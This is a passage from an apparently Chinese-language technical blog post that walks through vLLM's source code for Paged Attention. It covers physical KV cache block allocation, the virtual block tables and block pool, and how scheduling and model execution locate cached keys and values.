            # Schedule iteration
            (seq_group_metadata_list, scheduler_outputs,
             allow_async_output_proc
             ) = self.scheduler[virtual_engine].schedule()

            ctx.seq_group_metadata_list = seq_group_metadata_list
            ctx.scheduler_outputs = scheduler_outputs

            ...

        if not scheduler_outputs.is_empty():

            # Check if we have a cached last_output from the previous iteration.
            # For supporting PP this is probably the best way to pass the
            # sampled_token_ids, as a separate broadcast over all the PP stages
            # will cause one virtual engine's microbatch to block the pipeline.
            last_sampled_token_ids = \
                self._get_last_sampled_token_ids(virtual_engine)

            execute_model_req = ExecuteModelRequest(
                seq_group_metadata_list=seq_group_metadata_list,
                blocks_to_swap_in=scheduler_outputs.blocks_to_swap_in,
                blocks_to_swap_out=scheduler_outputs.blocks_to_swap_out,
                blocks_to_copy=scheduler_outputs.blocks_to_copy,
                num_lookahead_slots=scheduler_outputs.num_lookahead_slots,
                running_queue_size=scheduler_outputs.running_queue_size,
                finished_requests_ids=finished_requests_ids,
                # We use ExecuteModelRequest to pass the last sampled_token_ids
                # to each of the non-last PP stages for in-place prepare_input.
                last_sampled_token_ids=last_sampled_token_ids)

            if allow_async_output_proc:
                execute_model_req.async_callback = self.async_callbacks[
                    virtual_engine]

            try:
                outputs = self.model_executor.execute_model(
                    execute_model_req=execute_model_req)
                self._skip_scheduling_next_step = False
            except InputProcessingError as e:
                ...

            # We need to do this here so that last step's sampled_token_ids can
            # be passed to the next iteration for PP.
            if self.scheduler_config.is_multi_step:
                self._update_cached_scheduler_output(virtual_engine, outputs)
        else:
            ...

        # Finish the current step for all the sequence groups.
        if self.scheduler_config.is_multi_step:
            for seq_group in seq_group_metadata_list:
                seq_group.finish_step()

        if not self._has_remaining_steps(seq_group_metadata_list):
            # clear the cache if we have finished all the steps.
            if self.scheduler_config.is_multi_step:
                self.cached_scheduler_outputs[0] = SchedulerOutputState()

            # is_first_step_output is True only when the num_steps of all
            # the sequences are 1. When the num_steps > 1,
            # multi_step_model_runner does the first-step output append.
            is_first_step_output: bool = False if not seq_group_metadata_list \
                else seq_group_metadata_list[0].state.num_steps == 1

            # Add results to the output_queue
            ctx.append_output(outputs=outputs,
                              seq_group_metadata_list=seq_group_metadata_list,
                              scheduler_outputs=scheduler_outputs,
                              is_async=allow_async_output_proc,
                              is_last_step=True,
                              is_first_step_output=is_first_step_output)

            ...
        else:
            # Multi-step case
            return ctx.request_outputs

        if not self.has_unfinished_requests():
            # Drain async postprocessor (if exists)
            if len(ctx.output_queue) > 0:
                self._process_model_outputs(ctx=ctx)
            assert len(ctx.output_queue) == 0

            # Stop the execute model loop in parallel workers until there are
            # more requests to process. This avoids waiting indefinitely in
            # torch.distributed ops which may otherwise timeout, and unblocks
            # the RPC thread in the workers so that they can process any other
            # queued control plane messages, such as add/remove lora adapters.
            logger.debug("Stopping remote worker execution loop.")
            self.model_executor.stop_remote_worker_execution_loop()

        return ctx.request_outputs

这里我们只讨论推理的执行，该函数调用是调用下一层(executor)的execute_model，参数是一个ExecuteModelRequest，其中的seq_group_metadata_list保存了seq group的数据信息。

                outputs = self.model_executor.execute_model(
                    execute_model_req=execute_model_req)

executor只是中间商，会调用Worker的execute_model函数。在这个里面会调用Worker的prepare_input来准备模型的输入，然后有了输入调用Runner的execute_model开始完成一次推理过程。

class LocalOrDistributedWorkerBase(WorkerBase):
    ...
    def execute_model(
        self,
        execute_model_req: Optional[ExecuteModelRequest] = None,
    ) -> Optional[List[SamplerOutput]]:
        """Executes at least one model step on the given sequences, unless no
        sequences are provided."""
        start_time = time.perf_counter()

        inputs = self.prepare_input(execute_model_req)
        if inputs is None:
            return None

        model_input, worker_input, kwargs = inputs
        num_steps = worker_input.num_steps
        if (execute_model_req is not None and execute_model_req.spec_step_idx):
            kwargs["spec_step_idx"] = execute_model_req.spec_step_idx

        self.execute_worker(worker_input)

        # If there is no input, we don't need to execute the model.
        if worker_input.num_seq_groups == 0:
            return []

        intermediate_tensors = None
        orig_model_execute_time = 0.0
        ...

        output = self.model_runner.execute_model(
            model_input=model_input,
            kv_caches=self.kv_cache[worker_input.virtual_engine]
            if self.kv_cache is not None else None,
            intermediate_tensors=intermediate_tensors,
            num_steps=num_steps,
            **kwargs,
        )

        model_execute_time = time.perf_counter() - start_time
        if not get_pp_group().is_last_rank:
            # output is IntermediateTensors
            assert isinstance(output, IntermediateTensors)
            if (self.observability_config is not None
                    and self.observability_config.collect_model_execute_time):
                output.tensors["model_execute_time"] = torch.tensor(
                    model_execute_time + orig_model_execute_time)
            get_pp_group().send_tensor_dict(output.tensors,
                                            all_gather_group=get_tp_group())
            return [None]
        if (self.observability_config is not None
                and self.observability_config.collect_model_execute_time
                and output is not None):
            for o in output:
                o.model_execute_time = (orig_model_execute_time +
                                        model_execute_time)

        # output is List[SamplerOutput]
        return output

在Runner（这里是CPUModelRunner）中的execute_model会调用模型的forward函数。这里调用set_forward_context是将attention的数据与本次推理管理起来。随后调用model_executable(forward)。这里就到了实际模型(比如Qwen2ForCausalLM)的forward函数。

    def execute_model(
        self,
        model_input: ModelInputForCPUWithSamplingMetadata,
        kv_caches: List[torch.Tensor],
        intermediate_tensors: Optional[IntermediateTensors] = None,
        num_steps: int = 1,
        previous_hidden_states: Optional[torch.Tensor] = None,
    ) -> Optional[List[SamplerOutput]]:
        ...
        model_executable = self.model

        ...

        with set_forward_context(model_input.attn_metadata, self.vllm_config,
                                 model_input.virtual_engine):
            hidden_states = model_executable(
                input_ids=model_input.input_tokens,
                positions=model_input.input_positions,
                intermediate_tensors=intermediate_tensors,
                **execute_model_kwargs,
                **multimodal_kwargs,
            )

        # Compute the logits.
        logits = self.model.compute_logits(hidden_states,
                                           model_input.sampling_metadata)

        # Only perform sampling in the driver worker.
        if not self.is_driver_worker:
            return []

        # Sample the next token.
        output = self.model.sample(
            logits=logits,
            sampling_metadata=model_input.sampling_metadata,
        )
        if self.return_hidden_states:
            # we only need to pass hidden states of most recent token
            if model_input.is_prompt:
                output.prefill_hidden_states = hidden_states
            output.hidden_states = hidden_states
        return [output]

vLLM中的Paged Attention分析

2025-06-02T00:00:00+00:00

基本概念

上一篇文章中介绍了KV cache的概念以及作用，由于KV cache在推理中的作用性能提升很大，所以现在各种推理框架都会支持KV cache。本文介绍vLLM中的核心原理Paged Attention的实现，本文不会详细介绍vLLM的基本原理以及vLLM整体的源码架构分析（将来有机会争取写一下），所以假设读者需要熟悉大模型的基本推理过程以及vLLM基本代码架构，图解大模型计算加速系列之：vLLM核心技术PagedAttention原理文章是不错的介绍vLLM Paged Attention的原理性文章。

推理框架在进行推理过程中一个重要的环节是计算各个token之间的自注意力，KV cache保存了之前token的KV值，在计算当前token时，会引用KV cache中值。vLLM Paged Attention的核心机制就是在这里管理KV cache的时候采用了类似操作系统虚拟内存的概念，通过动态的分配KV cache的block，从而提高显存的利用效率。本文就是对这一机制进行分析，简单来讲，本文会从代码层面详细分析下面这个图的实现。

具体来讲，本文包括如下内容

物理block的分配
虚拟机block的管理
KV cache的使用

本文基于vLLM的CPU实现分析。一个Block类似操作系统的一个page，一个page通常管理固定大小的byte（一般是4096），一个Block也是管理固定大小的token的KV，比如上面的图一个Block管理4个token的KV，实际中一般会更大点。

物理block的分配

与操作系统的page在系统初始化阶段分配完成，每个page分配一个pfn类似，物理block在vLLM引擎初始化阶段会分配完成，每个物理block的id就是其在数组中的序号。vLLM中的这个图左边可以看做是虚拟Block的管理，右边可以看成是物理Block的管理（基本就是分配空间、swap in/out等），右边漏了一个executor，也可能是作者觉得不太重要。

KV cache初始化流程如下：

LLMEngine.__init__
  -->self._initialize_kv_caches(LLMEngine._initialize_kv_caches)
    -->self.model_executor.determine_num_available_blocks
    -->self.model_executor.initialize_cache
      -->self.collective_rpc("initialize_cache")
        -->CPUWorker.initialize_cache
          -->self._init_cache_engine(CPUWorker._init_cache_engine)
            -->CPUCacheEngine.__init__
              -->get_attn_backend
              -->self._allocate_kv_cache(CPUCacheEngine._allocate_kv_cache)
                -->self.attn_backend.get_kv_cache_shape
                -->kv_cache.append
            -->bind_kv_cache
            -->layer_cache.fill_(0)
      

self.model_executor.determine_num_available_blocks会决定总的物理Block个数（相当于操作系统里面总的page页数），包括num_gpu_blocks和num_cpu_blocks。

物理Block也就是KV cache的空间创建是在CPUWorker的_init_cache_engine函数中完成的。

    def _init_cache_engine(self) -> None:
        self.cache_engine = [
            CPUCacheEngine(self.cache_config, self.model_config,
                           self.parallel_config, self.device_config)
            for _ in range(self.parallel_config.pipeline_parallel_size)
        ]
        self.cpu_cache = [
            self.cache_engine[ve].cpu_cache
            for ve in range(self.parallel_config.pipeline_parallel_size)
        ]
        bind_kv_cache(self.compilation_config.static_forward_context,
                      self.cpu_cache)
        self.model_runner.block_size = self.cache_engine[0].block_size

        assert all(
            self.cpu_cache[ve] is not None
            for ve in range(self.parallel_config.pipeline_parallel_size))

        # Populate the cache to warmup the memory
        for ve in range(self.parallel_config.pipeline_parallel_size):
            for layer_cache in self.cpu_cache[ve]:
                layer_cache.fill_(0)

CPUCacheEngine是用来管理物理Block的核心，下面是初始化的第一部分代码，工作为初始化相关变量。head_size是注意力机制中头的维度大小和头数num_heads，每个layer都有对应的KV cache，所以这里要获取num_layers。block_size是每个block要保存的token数目的KV cache，num_cpu_blocks是之前获取的总共的CPU block。

class CPUCacheEngine:
    """Manages the KV cache for CPU backend.

    This class is responsible for initializing and managing CPU KV
    caches. It also provides methods for performing KV cache operations, such
    as copying.
    """

    def __init__(self, cache_config: CacheConfig, model_config: ModelConfig,
                 parallel_config: ParallelConfig,
                 device_config: DeviceConfig) -> None:
        assert device_config.device_type == "cpu"
        self.cache_config = cache_config
        self.model_config = model_config
        self.parallel_config = parallel_config

        self.head_size = model_config.get_head_size()
        self.num_layers = model_config.get_num_layers(parallel_config)
        self.num_heads = model_config.get_num_kv_heads(parallel_config)

        self.block_size = cache_config.block_size
        # Note: In CacheConfig, num_gpu_blocks actual is num_cpu_blocks
        # for CPU backend, because we want to reuse KV cache management
        # in the scheduler.
        self.num_cpu_blocks = cache_config.num_gpu_blocks

        if cache_config.cache_dtype == "auto":
            self.dtype = model_config.dtype
        elif cache_config.cache_dtype in ["fp8", "fp8_e5m2"]:
            self.dtype = torch.float8_e5m2
        else:
            raise NotImplementedError(f"Unsupported KV cache type "
                                      f"{cache_config.cache_dtype}.")

        # Get attention backend.
        self.attn_backend = get_attn_backend(
            self.model_config.get_head_size(),
            self.model_config.dtype,
            cache_config.cache_dtype,
            self.block_size,
            self.model_config.is_attention_free,
            use_mla=self.model_config.use_mla,
        )

        # Initialize the cache.
        self.cpu_cache = self._allocate_kv_cache(self.num_cpu_blocks)

CPUCacheEngine.__init__的第二部分用来获取实现attention计算的后端类，这个例子中会获取TorchSDPABackend。CPUCacheEngine.__init__的最后一部分调用self._allocate_kv_cache，完成实际的物理Block的分配。

我们看看_allocate_kv_cache的实现

    def _allocate_kv_cache(
        self,
        num_blocks: int,
    ) -> List[torch.Tensor]:
        """Allocates KV cache on CPU."""
        kv_cache_shape = self.attn_backend.get_kv_cache_shape(
            num_blocks, self.block_size, self.num_heads, self.head_size)
        kv_cache: List[torch.Tensor] = []
        for _ in range(self.num_layers):
            kv_cache.append(
                torch.empty(kv_cache_shape, dtype=self.dtype, device="cpu"))
        return kv_cache

self.attn_backend.get_kv_cache_shape的调用返回KV cache的，TorchSDPABackend直接调用PagedAttention.get_kv_cache_shape返回。

class TorchSDPABackend(AttentionBackend):
    ...
    def get_kv_cache_shape(
        num_blocks: int,
        block_size: int,
        num_kv_heads: int,
        head_size: int,
    ) -> Tuple[int, ...]:
        return PagedAttention.get_kv_cache_shape(num_blocks, block_size,
                                                 num_kv_heads, head_size)

class _PagedAttention:
    ...
    @staticmethod
    def get_kv_cache_shape(
        num_blocks: int,
        block_size: int,
        num_kv_heads: int,
        head_size: int,
        *args,
    ) -> Tuple[int, ...]:
        return (2, num_blocks, block_size * num_kv_heads * head_size)

可以看到kv_cache_shape是一个tuple，表示了KV cache的存储shape。2表示K和V个一个，num_blocks表示block的数量，block_size * num_kv_heads * head_size 表示每个block的大小，block_size是token数，num_kv_heads * head_size表示一个token需要存放的数据元素个数。我们知道一个token的K或者V值，它的维度是等于词的embedding的维度，这个值在多头自注意力中就是num_kv_heads * head_size。

回到CPUCacheEngine._allocate_kv_cache，获取到了kv_cache_shape的之后，会针对每个layer分配空的的Tensor。整个物理的KV cache分布如下，物理的Block就是在这里分配好空间的，后续使用只需要将物理Block看成是顺序分布的各个Block即可（类似Linux中的pages）。

回到CPUWorker._init_cache_engine，当初始化CPUCacheEngine完成之后，会调用bind_kv_cache，这个函数暂时不深究，本质就是要把这里的KV cache跟attention模块绑定，在模型做推理的时候能够找到这里的KV cache，以后分析vLLM流程的时候分析这里。

至此，物理Block就分配好了，下面看看虚拟Block的管理。

推理请求的block管理

Block的管理要看这个图的左半部分。

Scheduler的初始化

vLLM的请求都是在Scheduler中调度的，Scheduler类有一个成员block_manager，通常情况下，这个成员是SelfAttnBlockSpaceManager(BlockSpaceManager)的一个实例。相关函数调用关系如下：

Scheduler.__init__
  -->BlockSpaceManagerImpl(SelfAttnBlockSpaceManager.__init__)
    -->CpuGpuBlockAllocator.create
      -->NaiveBlockAllocator(NaiveBlockAllocator.__init__)
        -->BlockPool

下面是Scheduler.__init__的部分代码。

class Scheduler:

    def __init__(
        self,
        scheduler_config: SchedulerConfig,
        cache_config: CacheConfig,
        lora_config: Optional[LoRAConfig],
        pipeline_parallel_size: int = 1,
        output_proc_callback: Optional[Callable] = None,
    ) -> None:
        self.scheduler_config = scheduler_config
        self.cache_config = cache_config
        # Note for LoRA scheduling: the current policy is extremely
        # simple and NOT fair. It can lead to starvation of some
        # LoRAs. This should be improved in the future.
        self.lora_config = lora_config

        version = "selfattn"
        if (self.scheduler_config.runner_type == "pooling"
                or self.cache_config.is_attention_free):
            version = "placeholder"

        BlockSpaceManagerImpl = BlockSpaceManager.get_block_space_manager_class(
            version)

        num_gpu_blocks = cache_config.num_gpu_blocks
        if num_gpu_blocks:
            num_gpu_blocks //= pipeline_parallel_size

        num_cpu_blocks = cache_config.num_cpu_blocks
        if num_cpu_blocks:
            num_cpu_blocks //= pipeline_parallel_size

        # Create the block space manager.
        self.block_manager = BlockSpaceManagerImpl(
            block_size=self.cache_config.block_size,
            num_gpu_blocks=num_gpu_blocks,
            num_cpu_blocks=num_cpu_blocks,
            sliding_window=self.cache_config.sliding_window,
            enable_caching=self.cache_config.enable_prefix_caching,
        )

在初始化block_manager的时候，最核心的几个参数是block_size，num_gpu_blocks， num_cpu_blocks。接下来看SelfAttnBlockSpaceManager.__init__的实现。

class SelfAttnBlockSpaceManager(BlockSpaceManager):
    def __init__(
        self,
        block_size: int,
        num_gpu_blocks: int,
        num_cpu_blocks: int,
        watermark: float = 0.01,
        sliding_window: Optional[int] = None,
        enable_caching: bool = False,
    ) -> None:
        self.block_size = block_size
        self.num_total_gpu_blocks = num_gpu_blocks
        self.num_total_cpu_blocks = num_cpu_blocks

        ...
        self.block_allocator = CpuGpuBlockAllocator.create(
            allocator_type="prefix_caching" if enable_caching else "naive",
            num_gpu_blocks=num_gpu_blocks,
            num_cpu_blocks=num_cpu_blocks,
            block_size=block_size,
        )

        self.block_tables: Dict[SeqId, BlockTable] = {}
        ...

CpuGpuBlockAllocator.create本质上是返回用来分配物理Block的allocator，有GPU和CPU两个。SelfAttnBlockSpaceManager的另一个重要成员是block_tables，这里保存了Seq Group ID到block_table的映射，通过这个成员管理所有Seq Group的block table。

分析CpuGpuBlockAllocator.create，可以看到，通常情况下回创建NaiveBlockAllocator，这个类的__init__函数如下：

class NaiveBlockAllocator(BlockAllocator):
    """A simple block allocator that manages blocks of memory without prefix
    caching.

    Args:
        create_block (Block.Factory): A factory function for creating new
            blocks. This is used when a NaiveBlockAllocator is composed within
            a prefix caching allocator -- the naive block allocator must
            construct prefix caching blocks (but shouldn't know anything else
            about them).
        num_blocks (int): The total number of blocks to manage.
        block_size (int): The size of each block in tokens.
        block_ids (Optional[Iterable[int]], optional): An optional iterable of
            block IDs. If not provided, block IDs will be assigned sequentially
            from 0 to num_blocks - 1.
    """

    def __init__(
        self,
        create_block: Block.Factory,
        num_blocks: int,
        block_size: int,
        block_ids: Optional[Iterable[int]] = None,
        block_pool: Optional[BlockPool] = None,
    ):
        if block_ids is None:
            block_ids = range(num_blocks)

        self._free_block_indices: Deque[BlockId] = deque(block_ids)
        self._all_block_indices = frozenset(block_ids)
        assert len(self._all_block_indices) == num_blocks

        self._refcounter = RefCounter(
            all_block_indices=self._free_block_indices)
        self._block_size = block_size

        self._cow_tracker = CopyOnWriteTracker(
            refcounter=self._refcounter.as_readonly())

        if block_pool is None:
            extra_factor = 4
            # Pre-allocate "num_blocks * extra_factor" block objects.
            # The "* extra_factor" is a buffer to allow more block objects
            # than physical blocks
            self._block_pool = BlockPool(self._block_size, create_block, self,
                                         num_blocks * extra_factor)
        else:
            # In this case, the block pool is provided by the caller,
            # which means that there is most likely a need to share
            # a block pool between allocators
            self._block_pool = block_pool

CpuGpuBlockAllocator.create在创建NaiveBlockAllocator实例时，先为GPU Block和CPU Block分配了一组id，作为物理Block的唯一编号。在NaiveBlockAllocator.__init__中，这组ID存放在_all_block_indices成员中，另有一个成员_free_block_indices用来表示现在空闲可用的物理Block，在初始化，显然二者是相同的。成员_refcounter用来表示Block ID对应的ref count，表示有多少个请求在共享这个物理Block。

初始的簿记工作完成之后，会创建BlockPool，注意这里是创建虚拟的Block，其作用是记录Block的存放的token、物理的Block ID等。创建BlockPool的参数create_block是NaiveBlock类，pool_size是num_blocks * extra_factor，这里虚拟Block分得比物理Block多一点，类似操作系统中虚拟地址空间远远大于物理内存。

class BlockPool:
    """Used to pre-allocate block objects, in order to avoid excessive python
    object allocations/deallocations.
    The pool starts from "pool_size" objects and will increase to more objects
    if necessary

    Note that multiple block objects may point to the same physical block id,
    which is why this pool is needed, so that it will be easier to support
    prefix caching and more complicated sharing of physical blocks.
    """

    def __init__(self, block_size: int, create_block: Block.Factory,
                 allocator: BlockAllocator, pool_size: int):
        self._block_size = block_size
        self._create_block = create_block
        self._allocator = allocator
        self._pool_size = pool_size
        assert self._pool_size >= 0

        self._free_ids: Deque[int] = deque(range(self._pool_size))
        self._pool = []
        for i in range(self._pool_size):
            self._pool.append(
                self._create_block(prev_block=None,
                                   token_ids=[],
                                   block_size=self._block_size,
                                   allocator=self._allocator,
                                   block_id=None,
                                   extra_hash=None))

核心为创建NaiveBlock，即：

class NaiveBlock(Block):
    ...
    def __init__(self,
                 prev_block: Optional[Block],
                 token_ids: List[int],
                 block_size: int,
                 allocator: BlockAllocator,
                 block_id: Optional[int] = None,
                 _cow_target: Optional[Block] = None,
                 extra_hash: Optional[int] = None):
        self._token_ids: List[int] = []
        self._block_size = block_size
        self._prev_block = prev_block
        self._block_id = block_id
        self._allocator = allocator
        self._cow_target = _cow_target if _cow_target is not None else self

        self._append_token_ids_no_cow(token_ids)

可以看到，一个逻辑Block里面包含的该Block的Token ID(_token_ids)以及物理Block ID(_block_id)。下面的图展示了当前上述相关数据结构。

接下来分析vLLM在处理推理请求时是如何为请求分配虚拟Block的，本质就是SelfAttnBlockSpaceManager的block_tables成员的管理。

请求的处理

vLLM中的一个请求调度是从_schedule_prefills开始的，该函数调度处于prefill阶段的请求。vLLM中是按照seq group来处理请求的，每一个相同的prompt视为一个seq group。在_schedule_prefills时，通过调用self._allocate_and_set_running(seq_group)开始为新的seq group分配Block。整个过程相关调用如下：

Scheduler._schedule_prefills
  -->self.block_manager.can_allocate
  -->self._allocate_and_set_running
    -->self.block_manager.allocate(SelfAttnBlockSpaceManager.allocate)
      -->self._allocate_sequence
        -->block_table.allocate
          -->self._allocate_blocks_for_token_ids
            -->self._allocator.allocate_immutable_blocks
            -->self._allocator.allocate_mutable_block
          -->self.update

核心函数是_allocate_and_set_running，该函数调用block_manager.allocate为当前seq_group分配BlockTable.

    def _allocate_and_set_running(self, seq_group: SequenceGroup) -> None:
        self.block_manager.allocate(seq_group)
        for seq in seq_group.get_seqs(status=SequenceStatus.WAITING):
            seq.status = SequenceStatus.RUNNING

SelfAttnBlockSpaceManager的block_tables成员就是在allocate中开始填充的。block_tables是一个字典，key是seq_group的seq_id，value是一个BlockTable结构。

    def allocate(self, seq_group: SequenceGroup) -> None:

        # Allocate self-attention block tables for decoder sequences
        waiting_seqs = seq_group.get_seqs(status=SequenceStatus.WAITING)
        assert not (set(seq.seq_id for seq in waiting_seqs)
                    & self.block_tables.keys()), "block table already exists"

        # NOTE: Here we assume that all sequences in the group have the same
        # prompt.
        seq = waiting_seqs[0]
        block_table: BlockTable = self._allocate_sequence(seq)
        self.block_tables[seq.seq_id] = block_table

        # Track seq
        self._last_access_blocks_tracker.add_seq(seq.seq_id)

        # Assign the block table for each sequence.
        for seq in waiting_seqs[1:]:
            self.block_tables[seq.seq_id] = block_table.fork()

            # Track seq
            self._last_access_blocks_tracker.add_seq(seq.seq_id)

SelfAttnBlockSpaceManager._allocate_sequence用来分配BlockTable。

    def _allocate_sequence(self, seq: Sequence) -> BlockTable:
        block_table = BlockTable(
            block_size=self.block_size,
            block_allocator=self.block_allocator,
            max_block_sliding_window=self.max_block_sliding_window,
        )
        if seq.get_token_ids():
            # NOTE: If there are any factors affecting the block besides
            # token_ids, they should be added as input to extra_hash.
            extra_hash = seq.extra_hash()

            # Add blocks to the block table only if the sequence is non empty.
            block_table.allocate(token_ids=seq.get_token_ids(),
                                 extra_hash=extra_hash)

        return block_table

class BlockTable:
    ...
    def __init__(
        self,
        block_size: int,
        block_allocator: DeviceAwareBlockAllocator,
        _blocks: Optional[List[Block]] = None,
        max_block_sliding_window: Optional[int] = None,
    ):
        self._block_size = block_size
        self._allocator = block_allocator
        if _blocks is None:
            _blocks = []
        self._blocks: BlockList = BlockList(_blocks)

        self._max_block_sliding_window = max_block_sliding_window
        self._num_full_slots = self._get_num_token_ids()

可以看到BlockTable中的重要成员包括，_blocks，这个是一个BlockList结构体，而后者包含一个Block的list成员_blocks，以及一个int的list成员_block_ids。_blocks包含了一个seq中的所有虚拟Block，而_blocks_ids则包含了其对应的物理Block的block ID。

class BlockList:
    ...    
    def __init__(self, blocks: List[Block]):
        self._blocks: List[Block] = []
        self._block_ids: List[int] = []

        self.update(blocks)

回到SelfAttnBlockSpaceManager._allocate_sequence，在创建一个BlockTable之后，可以将prefill阶段的seq分配物理Block，即block_table.allocate的调用。

    def allocate(self,
                 token_ids: List[int],
                 device: Device = Device.GPU,
                 extra_hash: Optional[int] = None) -> None:
        ...
        assert not self._is_allocated
        assert token_ids
        blocks = self._allocate_blocks_for_token_ids(prev_block=None,
                                                     token_ids=token_ids,
                                                     device=device,
                                                     extra_hash=extra_hash)
        self.update(blocks)
        self._num_full_slots = len(token_ids)

核心是 BlockTable._allocate_blocks_for_token_ids

    def _allocate_blocks_for_token_ids(
            self,
            prev_block: Optional[Block],
            token_ids: List[int],
            device: Device,
            extra_hash: Optional[int] = None) -> List[Block]:
        blocks: List[Block] = []

        block_token_ids = []
        tail_token_ids = []
        for cur_token_ids in chunk_list(token_ids, self._block_size):
            if len(cur_token_ids) == self._block_size:
                block_token_ids.append(cur_token_ids)
            else:
                tail_token_ids.append(cur_token_ids)

        if block_token_ids:
            blocks.extend(
                self._allocator.allocate_immutable_blocks(
                    prev_block,
                    block_token_ids=block_token_ids,
                    device=device,
                    extra_hash=extra_hash))
            prev_block = blocks[-1]

        if tail_token_ids:
            assert len(tail_token_ids) == 1
            cur_token_ids = tail_token_ids[0]

            block = self._allocator.allocate_mutable_block(
                prev_block=prev_block, device=device, extra_hash=extra_hash)
            block.append_token_ids(cur_token_ids)

            blocks.append(block)

        return blocks

_allocate_blocks_for_token_ids中有两个局部list，block_token_ids和tail_token_ids，前者用来存放token id的前面block_size倍数的token id，后者存放最后不足block_size的token id。

接着为虚拟Block分配实际的物理Block。对于block_token_ids，由于里面的都是block_size大小的block，不会再增加了，所以调用allocate_immutable_blocks分配不可变的block，对于tail_token_ids，由于该Block还没有填满，所以后面还要再增加，因而调用allocate_mutable_block分配可变的的block。

这里先看看allocate_immutable_blocks的实现。

    def allocate_immutable_blocks(
            self,
            prev_block: Optional[Block],
            block_token_ids: List[List[int]],
            extra_hash: Optional[int] = None,
            device: Optional[Device] = None) -> List[Block]:
        assert device is None
        num_blocks = len(block_token_ids)

        block_ids = []
        for i in range(num_blocks):
            block_ids.append(self._allocate_block_id())

        blocks = []
        for i in range(num_blocks):
            prev_block = self._block_pool.init_block(
                prev_block=prev_block,
                token_ids=block_token_ids[i],
                block_size=self._block_size,
                physical_block_id=block_ids[i])
            blocks.append(prev_block)

        return blocks

num_blocks表示需要的Block个数，这个就是block_token_ids的个数。接着调用_allocate_block_id开始分配num_blocks个物理Block，该函数直接从NaiveBlockAllocator的_free_block_indices分配。

    def _allocate_block_id(self) -> BlockId:
        if not self._free_block_indices:
            raise BlockAllocator.NoFreeBlocksError()

        block_id = self._free_block_indices.popleft()
        self._refcounter.incr(block_id)
        return block_id

最后allocate_immutable_blocks调用self._block_pool.init_block初始化虚拟Block，可以看到这里的参数主要为token_ids，每个block的token ID以及pyhsical_block_id，物理的Block ID。

        for i in range(num_blocks):
            prev_block = self._block_pool.init_block(
                prev_block=prev_block,
                token_ids=block_token_ids[i],
                block_size=self._block_size,
                physical_block_id=block_ids[i])
            blocks.append(prev_block)

init_block再次调用了NaiveBlock的__init__函数，不同于pool初始化token id是空，这次的token_ids和physical_block_id都是实际值。

    def init_block(self,
                   prev_block: Optional[Block],
                   token_ids: List[int],
                   block_size: int,
                   physical_block_id: Optional[int],
                   extra_hash: Optional[int] = None) -> Block:
        if len(self._free_ids) == 0:
            self.increase_pool()
            assert len(self._free_ids) > 0

        pool_id = self._free_ids.popleft()

        block = self._pool[pool_id]
        block.__init__(  # type: ignore[misc]
            prev_block=prev_block,
            token_ids=token_ids,
            block_size=block_size,
            allocator=block._allocator,  # type: ignore[attr-defined] 
            block_id=physical_block_id,
            extra_hash=extra_hash)
        block.pool_id = pool_id  # type: ignore[attr-defined]
        return block

NaiveBlock.__init__除了初始化相关变量，最重要的是调用self._append_token_ids_no_cow将当前的token ids加入到NaiveBlock._token_ids中。

这样，allocate_immutable_blocks就分配了物理Block并且将初始化了虚拟Block。在上面初始化的图上，可以画出下面的数据结构关系图，从图上可以清楚的看到虚拟Block是如何对应到物理Block的。

KV cache的使用

推理前的数据准备工作

要了解KV cache的时候，也就是上述从虚拟Block寻址到真正的物理Block，需要简单看看vLLM的推理过程。vLLM的推理过程是放到LLMEngine.step中的，简单分析这个函数的调用关系。注意：由于我的vLLM环境在写文章的时候坏了，下面的顺序是按照之前调试的记忆写的，可能有误，等我重新配置vLLM之后再确认下。

LLMEngine.step
  -->self.scheduler[virtual_engine].schedule()
  -->ExecuteModelRequest
  -->self.model_executor.execute_model
    -->DistributedExecutorBase.execute_model
      -->self._driver_execute_model
        -->DistributedExecutorBase.execute_model
          -->LocalOrDistributedWorkerBase.execute_model
            -->self.prepare_input
              -->self._get_driver_input_and_broadcast
                -->self.prepare_worker_input
                -->model_runner.prepare_model_input
                  -->_prepare_model_input_tensors
                    -->self.builder.build
                      -->self._build_input_data
                      -->self.att_metadata_builder.build
            -->self.execute_worker
            -->self.model_runner.execute_model

LLMEngine.step中会调用schedule()获取当前需要调度的请求，schedule()会返回一个变量seq_group_metadata_list，这里面包含了即将被调度的seq group的元数据信息，其中的每个seq的元数据信息保存在SequenceGroupMetadata。

            (seq_group_metadata_list, scheduler_outputs,
             allow_async_output_proc
             ) = self.scheduler[virtual_engine].schedule()

            ctx.seq_group_metadata_list = seq_group_metadata_list

SequenceGroupMetadata有个很重要的成员block_tables，注意这个block_tables不要跟上面的SelfAttnBlockSpaceManager中的block_tables搞混淆了，这里的block_tables是一个dict，key是seq ID，value是物理Block ID的列表。

class SequenceGroupMetadata(
   ...
    request_id: str
    is_prompt: bool
    seq_data: dict[int, SequenceData]
    sampling_params: Optional[SamplingParams]
    block_tables: dict[int, list[int]]
    do_sample: bool = True

seq_group_metadata_list变量的创建如下：

class Scheduler:
          def schedule():
              ...
              for seq in seq_group.get_seqs(status=SequenceStatus.RUNNING):
                  seq_id = seq.seq_id
                  seq_data[seq_id] = seq.data
                  block_tables[seq_id] = self.block_manager.get_block_table(seq)
                  self.block_manager.access_all_blocks_in_seq(seq, now)
              ...

            if is_first_prefill or not self.scheduler_config.send_delta_data:
                seq_group_metadata = SequenceGroupMetadata(
                    request_id=seq_group.request_id,
                    is_prompt=is_prompt,
                    seq_data=seq_data,
                    sampling_params=seq_group.sampling_params,
                    block_tables=block_tables,
                    do_sample=do_sample,
                    pooling_params=seq_group.pooling_params,
                    token_chunk_size=token_chunk_size,
                    lora_request=seq_group.lora_request,
                    computed_block_nums=common_computed_block_nums,
                    encoder_seq_data=encoder_seq_data,
                    cross_block_table=cross_block_table,
                    state=seq_group.state,
                    token_type_ids=seq_group.token_type_ids,
                    ..
                )
            else:
                ...
            seq_group_metadata_list.append(seq_group_metadata)

最核心的就是block_tables的计算，可以看到，本质就是获取了seq ID对应的物理Block ID。

class SelfAttnBlockSpaceManager:
    ...
    def get_block_table(self, seq: Sequence) -> List[int]:
        block_ids = self.block_tables[seq.seq_id].physical_block_ids
        return block_ids  # type: ignore

class BlockTable:
    def physical_block_ids(self) -> List[int]:
        ...
        return self._blocks.ids()

接下来看ModelInputForCPUBuilder中的_build_input_data函数。

    def _build_input_data(self):
        for seq_group_metadata in self.seq_group_metadata_list:
            for seq_id, seq_data in seq_group_metadata.seq_data.items():
                if seq_group_metadata.is_prompt:
                    self._compute_prompt_input_tokens(self.input_data,
                                                      seq_group_metadata,
                                                      seq_data, seq_id)
